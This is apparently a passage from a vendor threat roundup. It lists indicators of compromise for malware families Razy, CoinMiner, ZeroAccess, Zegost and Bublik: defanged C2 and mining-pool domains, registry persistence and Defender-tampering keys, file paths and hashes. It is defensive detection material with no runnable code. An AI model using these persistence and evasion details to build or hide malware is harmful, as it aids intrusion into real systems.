%APPDATA%\Sybato\uhlyw.siz 1
%APPDATA%\Gaywu\tykid.qua 1
%APPDATA%\Waku\urpi.ulc 1
%APPDATA%\Moymyw\cabih.xom 1
%APPDATA%\Wibuw\olob.isq 1
%APPDATA%\Qyrow\huhat.niu 1
%APPDATA%\Sitaa\qeot.bef 1
%APPDATA%\Unresa\awty.est 1
%APPDATA%\Ukhyug\quin.qyt 1
%APPDATA%\Deigne\idhy.cof 1

File Hashes

03801d6f35fc090b42b7ad9b6bcf50652945b54e111ff9c4805d108812714818
048f1e48676fde8871ecfc9511259d03efa522b08476837686efdea5b5d569e2
05fb710e42d595273845d0fbbf91105edf780e771884b0db17305e9e20a8e8f5
0dd8633bb8410923c89f09c1e710dc86539f6b315d3f26569a05389f9e4cf837
12333b891f3aa45e7163b85d1a322a0e136d3d2643ecd60a2021d92c4de6be4b
12bc6788bc48168d560ad2ec06e8ef952197ccc67597c3392cc9fab9ff4aeaa7
1829ab16c372e8caa0e70eb64dbad2242d209b3087759ad17416ee12e4b7423f
1d9680073db99cc6c616ba241cd62b034699acfc55a87d924d4671db8b1a11b4
2ce8a0f52d43da56472c93ac58c6169f9d024263568b67808ed5d824331f89ad
2d9891b759f25c12610d1d65fef7903d96691cb83825544a234005a4079e0141
2e563a8d7d4a4e8500b87e83e8cbc60bfe69087b48dd15524d236cd005e4c93e
2f098b91d587fea4f82bc11f89b3fe729aa420b1ab128401204824c09d3febc0
3198765a126a11a4ddda7119e5f1cc0306d3d7a8d02e8001986381747c5fc77f
32cd5ca6922acb4422de7a1b32d51c04f18f45e43fddbb00d99dc98dcee2d996
35e416b7ec7d70327ed12316954762b47096ae4ad1907100b3e80fc918560914
3785b5e32766b95f6c22ac9605c4b28d08257da151a51623cbd6be9059b02077
3a95bb4bc9cad33582fa741d8f29b93635a3f2e1d0a1dc56e09bf215fda6044f
4a5fc4abcfe923a2a664998ef384093ffca3d01453d86f9ebaa44cccdbf60946
4e8979e3fa7d45d4a12c0885ae2777251d7b3c49dc18e9739438e1f9e790ddd1
524b2a6133876e1dd6aae029fe6cf9706dd4d728f9f78c59447d09e8bace5e24
5426f62ba7aa68b3e650a66cf7eec8dfa4c9541d2e52fc66666ebaf4dfb9f78c
5a897d3fe0398472b76bcdd4bbeb7792d014b82784c406fdebcff0eae12cc156
606a7ff530201567f25b38141c904e6ab9734825a4e27cfb0fc3d8f8867095da
633e8cb4c35545a1a989ef51e54c79e1c296813cbe656299a6e9a56914341a97
64f5c6343ac0b2928c448fc41c89ac73042330713fb0aa089e3b5b24e82e8ed6

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Razy-9859337-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Shell
9
<HKCU>\SOFTWARE\7E3975E4EF230D7D9195 1
<HKCU>\SOFTWARE\7E3975E4EF230D7D9195
Value Name: 4E47C429C681B3A23CF9BF8CDF60CAB79FBEDDB88B39B406A61CE21097DD7FE6
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: shrpubw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WSReset
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: RelPost
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cxcxcxccgghhghghbytfd
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: aonedri
1
MutexesOccurrences
Aakn1515knAakn1515kn! 10
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
193[.]142[.]146[.]202 10
179[.]43[.]140[.]185 10
179[.]43[.]140[.]144 8
104[.]26[.]12[.]31 5
162[.]159[.]129[.]233 4
104[.]26[.]13[.]31 3
162[.]159[.]135[.]233 2
162[.]159[.]134[.]233 2
162[.]159[.]133[.]233 1
162[.]159[.]130[.]233 1
104[.]23[.]99[.]190 1
172[.]67[.]75[.]172 1
172[.]67[.]195[.]195 1
104[.]21[.]60[.]100 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
cdn[.]discordapp[.]com 10
api[.]ip[.]sb 9
pastebin[.]com 1
megator[.]xyz 1
greencodeteam[.]top 1
Files and or directories createdOccurrences
%TEMP%\MyTemp 19
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.log 10
%TEMP%\RegAsm.exe 10
%TEMP%\D8E6.tmp 10
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\Setup2.exe.log 10
%TEMP%\Setup5.exe 10
%TEMP%\MyTemp\Setup.exe 10
%TEMP%\MyTemp\Setup2.exe 10
%TEMP%\MyTemp\Setup3.exe 10
%TEMP%\MyTemp\Setup4.exe 10
%TEMP%\MyTemp\Setup5.exe 10
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\Setup3.exe.log 9
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\Setup4.exe.log 9
%APPDATA%\hgfhgfdhfhfdgfnnhrgergcbjjsn.exe 9
%APPDATA%\fffaaaaddddddffffffgcbjjsn.exe 9
%TEMP%\aspnet_compiler.exe 9
%LOCALAPPDATA%\gdfgdhfdhfdfafddchghgfgh.exe 9
%TEMP%\Setup4.exe 9
%LOCALAPPDATA%\ffdgsgdgsdgone.exe 9
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 9
%APPDATA%\shrpubw 1
%TEMP%\InstallUtil.exe 1
%TEMP%\AdvancedRun.exe 1
%TEMP%\zMukqyfai.vbs 1
%APPDATA%\shrpubw\shrpubw.exe 1

*See JSON for more IOCs

File Hashes

0081891e98a684a35045026477da2cdae3c026c5697d1e731787a009f02bd600
0fc5c2ca3d269f0a5ae400506ea2e5521c8cc3b84d31cad7d08dc3d5f5e62e0e
1d0e2ba2345ca95434209367d62c12cc166c7e71d27a9962c66cccac3a9db0f7
31a4d8861e9df85af067f38f083ee911150147463554bf9daa92c388b7699a41
3788333af7071462aee69db7da39a8cec57aa43142f42a7ab5d899a3a85910b5
3a1bfd5f044b35ac6e39825f4e0c9c02b0dbb2fd6ebe58a2dcfdbcaa747b8fe8
51e0919a448c89b54554feb0530424c85fb3784e7cbee82b95b4ce4f95171be0
56f7304bded122e193fa629e6e0a5b1508d7f441808a8b4213389b9883c14b20
5a72a8e671bbe9bca22ced31badc03f09a2dffb03327ec5b2d91142a1a8c4ae0
5d10a40c3150381ff6beae07feb53067ab47536ea03de76b508580af6dd7d846
64c4211d467f4770c7ec53437662f3655b1bd307a1b291953497e68810b85aae
6861ba8fa393aa1b23559cdc5e7421dbc43e973dce991e2a6ab0ad556679df78
85f5dc9ed5fc343f837ce29d6c6ccfcb01bf874590a2ba0f063178e4cb773e0c
a25440081043e1173b84506a177a93852d8bf6a98b27e1a943591ff8c1119a7d
aecc8984c6ff60957eba81d7b3d552e53c9f42013b2636dfc04e670b3fc7926c
d9db84a8f2bf0b78dc782fa2736ff08c7b12b04934c90e5757262f63c96c1670
dab601045ce9ff7de01220447a017cb0b06cef0e1d1a9fa3c38e097375a822df
dd6c71319c33852f869d7d1ab03d52f771304fb1106d008b9f0fb90f079a77f0
e82f7124e53a9c43be5421129263751d3e2d6f38e9f7f98a8ea24524363cb600

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.CoinMiner-9859396-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
49[.]12[.]80[.]40 4
49[.]12[.]80[.]38/31 4
13[.]107[.]21[.]200 3
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
xmr[.]pool[.]minergate[.]com 4
pool[.]minergate[.]com 4
www[.]bing[.]com 3
Files and or directories createdOccurrences
%ProgramFiles%\Windows Mail\Microsoft Windows DirectX.bat 4
%ProgramFiles%\Windows Mail\Microsoft Windows DirectX.vbs 4
%ProgramFiles%\Windows Mail\msvcr120.dll 4
%ProgramFiles%\Windows Mail\system32.exe 4
%ProgramFiles%\Windows Mail\wfhack.vbs 4
%ProgramFiles%\Windows Mail\neon32.bat 4
%ProgramFiles%\Windows Mail\neon32.exe 4
%ProgramFiles%\Windows Mail\neon32.vbs 4
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows DirectX.lnk 3
%ProgramFiles%\x86 2
%ProgramFiles%\x86\msvcr120.dll 1
%ProgramFiles%\x86\neon32.bat 1
%ProgramFiles%\x86\neon32.exe 1
%ProgramFiles%\x86\neon32.vbs 1
%ProgramFiles%\x86\system32.exe 1
%ProgramFiles%\x86\wfhack.vbs 1
%ProgramFiles%\x86\x86.bat 1
%ProgramFiles%\x86\x86.vbs 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\system32.lnk 1

File Hashes

065e2d1fcd04b1512b6f96bb4fe91cd711252e89c47d0c7f76abe8caa62204df
10eb495f579fd3e2b3933124a569ddb52a6e68cf08a186ea0931af7a7dc6d644
1837c3e4d33557d5fa561665b5aa3d3e42b6c150e5a1761199c9cb73e3b4867c
3ae3740afc91fb798d1ab52b67769739260e8f53fb721f79ee27b2fe9e3ac2e1
5f9e0b2231ce55065b019a0910cfce4cc4f2166ffb27d76cbd84f318c9d505b2
a0129028addec9655f54c7483b1c4f1f078cff5560f83e47c9ab466c43b09b7b
a23e1d5bc44cf031e3d2a2b2dcad8e355f3b4e24ebcc87d319a0f255f954aa25
a6569e7f92e518983114b1847cf1f07cefb0a5dd42a4e9d5e3de955120af5835
c5fac793bbefc5cca5d8cb381d07bbd24b7bc46c5d75d218568a35e1f6f86fab
d20e15e3a8118dddf4301588ce688950b92120d29c03d03ef3ac26d25bc5acc8
f54d94207c6489b09478e95d7a4d3c2a1f0e5881f433366f00bebacae828bd31

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Win.Packed.ZeroAccess-9859480-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 40 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Start
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: DeleteFlag
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: DeleteFlag
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: DeleteFlag
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER
Value Name: Start
40
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32
Value Name: ThreadingModel
40
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32 40
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
40
<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32 40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: DeleteFlag
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010
Value Name: PackedCatalogItem
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000009
Value Name: PackedCatalogItem
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000008
Value Name: PackedCatalogItem
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000007
Value Name: PackedCatalogItem
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000006
Value Name: PackedCatalogItem
40
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
88[.]254[.]253[.]254 37
71[.]254[.]253[.]254 37
180[.]254[.]253[.]254 37
135[.]254[.]253[.]254 37
222[.]254[.]253[.]254 37
213[.]253[.]253[.]254 37
212[.]253[.]253[.]254 37
184[.]253[.]253[.]254 33
180[.]253[.]253[.]254 33
168[.]253[.]253[.]254 33
115[.]253[.]253[.]254 33
71[.]253[.]253[.]254 33
187[.]252[.]253[.]254 33
171[.]252[.]253[.]254 33
151[.]252[.]253[.]254 33
83[.]133[.]123[.]20 20
184[.]39[.]192[.]250 20
86[.]64[.]5[.]212 16
31[.]19[.]213[.]221 15
46[.]47[.]98[.]47 14
174[.]45[.]173[.]219 14
67[.]61[.]64[.]86 14
69[.]34[.]30[.]185 14
68[.]61[.]104[.]80 14
70[.]186[.]198[.]27 14

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
j[.]maxmind[.]com 40
Files and or directories createdOccurrences
\$Recycle.Bin\S-1-5-18 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@ 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@ 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n 40
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\@ 39
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\n 39

File Hashes

00f78e8595bbeb85896a4bf16b7d31729cabb1718bca236861110fbdaa707f8d
014db5ac46ce3a8ead9f4384453410a143565c55652771f2d96064ea44e3d797
020c322e92edde410cb0379321ba0d7998e43f92e7f56fa2bb103a2baf41f659
026e156255577ecc8c2abb849d4427578d9231589e9fc01b5dd5b08a0892833c
04a89a912ebd6da10794b05029d5167def7c60d0e2533f4048b58a4448137754
054a8f92a4a015700cf64517dfcd77d4c9985d039cd6ee34dbddae573c3f686e
080b9c87925140c52a6c09810acf455b6c259f8357ddc736be9959c8634d913e
0879c3365595d042c111ca6a6163aeb1b976d960934023ac98ebc90ff4ac7bc0
089442309a205940b396c49b4ea9568f7ab9820faf5fa9edd14b35667f0b3bad
08a987ea8c72fa58740c7db6792a2e965a038eab6e124a70e8276bbd14a9b56b
09bacd3794fae55325cc6ae93ea18f38a11e2efcc670596cf939f4b909b6f9d5
0aff124bd90096c4cb213ce17ede37087caf6f737f4702f5040c896f86b64271
0de61521328c88dc552d9cf0a61b206075daf9f72f2cfc1b7d28f3a9dde9469f
0ef1860324bb0e059a0501866699fcf9b40cdb1fdb50572f2369378a4e74cecf
0faa27e4818b20e01bdca65234b685aec5d143754484856327a4015fb542611b
1209ab7996c03be4b31c8f73122ba3e6c2a7d8f7c5698dd2fead7f3fa8a2cd47
13590d33925fbed21b516148032fbda602b694edf5ad10493e11bbfe9ea856bf
13677734c754bfcd7e3de7c153bf2564ee2a977e4023b50543913b14636c5d83
138112959f360890429b9337adc68bc9a64f4b744a07f0693a4bb284173ffa86
14274e46aefe4c3325c347ed97a22263d5a57a66c79b7ee2325ac7847ba6220d
14c8f972201b5fc4db9fa556f248e8d623ed44ca18c9e1051ab2eede07c0658b
16a415384de85939baebc26086d5a9d20d4cbb712e8ba9da4a108f1d633fa885
16c74e2efd782bf378f0f048f9f8a4b138e818e38917f1f94b64714696cd4086
17139f3e33ed907392b774da9412a8ee57e79e0f0130e35eaab773c2f849db92
1a1ef32108cb45778fabb219e5ae4d3ebf13358f277155f606a2f7995b007cee

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Zegost-9860024-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: Beep
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: svcname
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ConnectGroup
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorPath
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\C7NKESBL\PARAMETERS 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: C7nkESBl
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\C7NKESBL\PARAMETERS
Value Name: ServiceDll
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUDXEJRG\PARAMETERS 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: FUdXeJRG
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUDXEJRG\PARAMETERS
Value Name: ServiceDll
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDDJGH2\PARAMETERS 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: WPDdjGH2
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDDJGH2\PARAMETERS
Value Name: ServiceDll
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\J6Y8MMV2\PARAMETERS 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: J6Y8mmV2
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\M3I1XBDE\PARAMETERS 3
MutexesOccurrences
Global\<random guid> 19
<random, matching '[a-zA-Z0-9]{6}'>.pic 19
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
157[.]122[.]62[.]205 3
183[.]236[.]2[.]18 3
27[.]40[.]253[.]131 3
59[.]42[.]71[.]178 2
14[.]210[.]95[.]203 2
59[.]35[.]32[.]87 1
14[.]113[.]128[.]7 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
a6657457[.]3322[.]org 3
ahai22680[.]3322[.]org 2
xiaoyu9633[.]3322[.]org 2
425900290[.]3322[.]org 2
a4114325[.]6600[.]org 2
a846578461[.]gicp[.]net 1
a616713144[.]3322[.]org 1
aaxaa11[.]3322[.]org 1
woai1184661657[.]gicp[.]net 1
wqvb137110[.]3322[.]org 1
aaa520520[.]3322[.]org 1
mojun1688[.]3322[.]org 1
a759112398[.]3322[.]org 1
Files and or directories createdOccurrences
%ProgramFiles(x86)%\MSN 19
%TEMP%\C_Program360.tmp 19
%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{6}'>.pic 19
%System32%\<random, matching '[a-zA-Z0-9]{6}'>.pic 18

File Hashes

073bb451076f43f85b75b50d2d3aa1b136a31b849ab0afffbc03374ce4d06fb7
1979513537134433b04c5e88674d41923d12b9a92325d807aad729ae09b0f7e9
19b067cca6aa17a09c4c1de05738c341407c7129fb411370bbbf64f4656793df
204004daa0a87485d00cbb49f98829ce0faed3476969a11712e0954676109c2a
27dad51e22180a2cb4e9d017e6891477e69b21eef469ce81324a7ea62a73c38e
2983244867492f36ded8a178bae0824c560f301c9887256069f659f22a387ace
416fab3099fd266292ce1386755868cb9a24961cc2d8445ec526fb714b00731e
508eae67c2fe24ec84ad82d35040db81124d905a3dced1fa4731dc39b6795b25
5b7a7ef240d9c6637915177acc1deb1a3e93851dd902fec4ef982040d93df27d
5cdbd49fd10b6d1d6261f07beb65b8003417a52cdfdef0eee04486636a701a73
673537eb3daf02d20d9056a257b1e4b7ce9f143b3f458b192885d8e8604079a7
7704e1a76821814c59635b4c5eee5e42ef623a029e167890b1c1127b2fc737c7
8045f5b09c7b145376b2440639850d3c4945fd156e3a2232a7f134bd1c03029f
827c526e0cb18f45a1346b4e3daf996e36e3279c549a15589de16789a98067db
acbb5699c02dab7427426bef24c4b0081ac933c00bf8caa26525a8f31960794a
bb21a6391b3d3044a74ed81b075b34cd3ac57d2219b4fcd0aca6e9dec90dca3c
c95732fcaf2191a318a33090443776e0829dde79414d4201baa9291a41991d20
cf4b208082b3eddd949f49861a0cd0fe0cc029278849ffda6a56ef3830ea9002
d2aa3974caf524a38c80c94606309dc5f64662a554d43fa2863e19fb8e9238aa

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Bublik-9859726-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\LAYERS 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\DOMAINPROFILE\AUTHORIZEDAPPLICATIONS\LIST 25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\LAYERS
Value Name: C:\Windows\SysWOW64\wmpdl64.exe
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\wmpdl64.exe
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\DOMAINPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\wmpdl64.exe
13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Media Download
13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\LAYERS
Value Name: C:\Windows\SysWOW64\wmpdn64.exe
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\wmpdn64.exe
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\DOMAINPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\wmpdn64.exe
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Media Manager
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\LAYERS
Value Name: C:\Windows\SysWOW64\igfxtc64.exe
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\igfxtc64.exe
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\DOMAINPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\igfxtc64.exe
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Intel Task Control
5
MutexesOccurrences
muipcdraotse 25
V8x 13
S3xY! 12
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
66[.]128[.]53[.]179 25
204[.]11[.]237[.]59 25
157[.]240[.]2[.]35 5
104[.]21[.]57[.]186 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
jmp-53-90-02[.]level7-co2-as86409[.]su 13
ptr-55-98-06[.]level7-co2-as86409[.]su 13
jmp-53-75-05[.]level6-co2-as85026[.]su 12
ptr-53-77-09[.]level6-co2-as85026[.]su 10
nat93-162[.]level14-c01-as86179[.]su 6
nat04-148[.]level13-c01-as50213[.]su 5
nat82-145[.]level13-c01-as50213[.]su 4
nat103-142[.]level13-c01-as50213[.]su 3
nat113-170[.]level14-c01-as86179[.]su 3
nat08-155[.]level14-c01-as86179[.]su 3
nat3[.]level14-c01-as92013[.]su 1
Files and or directories createdOccurrences
\Autorun.inf 25
E:\Autorun.inf 25
E:\~Restore.{645FF040-5081-101B-9F08-00AA002F954E} 25
E:\~Restore.{645FF040-5081-101B-9F08-00AA002F954E}\res-p0391726.id 13
\~Restore.{645FF040-5081-101B-9F08-00AA002F954E}\res-p0391726.id 13
%SystemRoot%\SysWOW64\wmpdl64.exe 13
E:\~Restore.{645FF040-5081-101B-9F08-00AA002F954E}\res-p3950610.id 12
\~Restore.{645FF040-5081-101B-9F08-00AA002F954E}\res-p3950610.id 12
%SystemRoot%\SysWOW64\wmpdn64.exe 7
%SystemRoot%\SysWOW64\igfxtc64.exe 5

File Hashes

0001f5c361a6c8f721d64cfa417ab3e46b9e0ace2fbb8f913c7b88ea9952ab96
01bc8b225729c96e50314347277e643f927f09013c0457c91b0ff0d39c0921cc
075b2a86c38421bc66e55800930fbc823a1b5a6a3ae8d7c62546fb9990ea428c
0b367532e9458e450044234690331ba7ffe2e55eadb37cf5c4be2d10b6936069
